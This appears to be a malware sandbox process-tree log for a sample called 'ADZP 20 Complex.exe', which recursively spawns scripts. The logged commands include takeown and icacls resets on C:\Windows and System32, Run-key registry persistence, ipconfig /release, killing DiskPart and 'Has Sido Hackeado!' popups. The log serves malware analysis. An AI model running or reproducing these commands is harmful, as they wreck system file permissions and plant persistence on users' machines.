C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat9⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
- Modifies registry class
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f9⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f9⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release9⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f9⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado9⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado9⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!9⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5DD.tmp\5DE.tmp\5DF.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""10⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"11⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat11⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r12⤵
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release11⤵
- Gathers network information
-
C:\Windows\system32\notepad.exenotepad9⤵
-
C:\Windows\system32\calc.execalc9⤵
-
C:\Windows\explorer.exeexplorer.exe9⤵
-
C:\Windows\system32\mspaint.exemspaint.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1AAD.tmp\1AAE.tmp\1AAF.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""10⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"11⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat11⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r12⤵
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release11⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f11⤵
- Kills process with taskkill
-
C:\Windows\system32\notepad.exenotepad9⤵
-
C:\Windows\system32\calc.execalc9⤵
-
C:\Windows\explorer.exeexplorer.exe9⤵
-
C:\Windows\system32\mspaint.exemspaint.exe9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\system32\notepad.exenotepad7⤵
-
C:\Windows\system32\calc.execalc7⤵
-
C:\Windows\explorer.exeexplorer.exe7⤵
- Modifies registry class
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\system32\notepad.exenotepad5⤵
-
C:\Windows\system32\calc.execalc5⤵
- Modifies registry class
-
C:\Windows\explorer.exeexplorer.exe5⤵
- Modifies registry class
-
C:\Windows\system32\mspaint.exemspaint.exe5⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\81E.tmp\81F.tmp\820.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""6⤵
- Checks computer location settings
- Drops autorun.inf file
- Modifies registry class
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"7⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat7⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r8⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f7⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f7⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release7⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f7⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!7⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4EC7.tmp\4EC8.tmp\4EC9.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"9⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat9⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f9⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f9⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release9⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f9⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado9⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado9⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!9⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E698.tmp\E6A9.tmp\E6AA.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""10⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat11⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r12⤵
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f11⤵
-
C:\Windows\system32\notepad.exenotepad9⤵
-
C:\Windows\system32\calc.execalc9⤵
-
C:\Windows\explorer.exeexplorer.exe9⤵
-
C:\Windows\system32\mspaint.exemspaint.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A5D.tmp\A5E.tmp\A5F.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""10⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"11⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat11⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release11⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f11⤵
- Kills process with taskkill
-
C:\Windows\system32\notepad.exenotepad9⤵
-
C:\Windows\system32\calc.execalc9⤵
-
C:\Windows\explorer.exeexplorer.exe9⤵
-
C:\Windows\system32\mspaint.exemspaint.exe9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\system32\notepad.exenotepad7⤵
-
C:\Windows\system32\calc.execalc7⤵
- Modifies registry class
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\explorer.exeexplorer.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5B0C.tmp\5B0D.tmp\5B1D.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"9⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat9⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Modifies file permissions
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f9⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f9⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release9⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f9⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado9⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado9⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!9⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\25A5.tmp\25A6.tmp\25A7.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""10⤵
-
C:\Windows\system32\notepad.exenotepad9⤵
-
C:\Windows\system32\calc.execalc9⤵
-
C:\Windows\explorer.exeexplorer.exe9⤵
-
C:\Windows\system32\mspaint.exemspaint.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4E6B.tmp\4E6C.tmp\4E6D.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""10⤵
-
C:\Windows\system32\notepad.exenotepad9⤵
-
C:\Windows\system32\calc.execalc9⤵
-
C:\Windows\explorer.exeexplorer.exe9⤵
-
C:\Windows\system32\mspaint.exemspaint.exe9⤵
-
C:\Windows\system32\notepad.exenotepad7⤵
-
C:\Windows\system32\calc.execalc7⤵
-
C:\Windows\explorer.exeexplorer.exe7⤵
- Modifies registry class
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
- Modifies registry class
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\system32\notepad.exenotepad5⤵
-
C:\Windows\system32\calc.execalc5⤵
- Modifies registry class
-
C:\Windows\explorer.exeexplorer.exe5⤵
-
C:\Windows\system32\mspaint.exemspaint.exe5⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵
-
C:\Windows\system32\calc.execalc5⤵
-
C:\Windows\explorer.exeexplorer.exe5⤵
-
C:\Windows\system32\mspaint.exemspaint.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"5⤵
-
C:\Windows\system32\notepad.exenotepad5⤵
-
C:\Windows\system32\calc.execalc5⤵
-
C:\Windows\explorer.exeexplorer.exe5⤵
-
C:\Windows\system32\cmd.execmd.exe5⤵
-
C:\Windows\system32\notepad.exenotepad5⤵
-
C:\Windows\system32\mspaint.exemspaint.exe5⤵
-
C:\Windows\system32\calc.execalc5⤵
-
C:\Windows\explorer.exeexplorer.exe5⤵
-
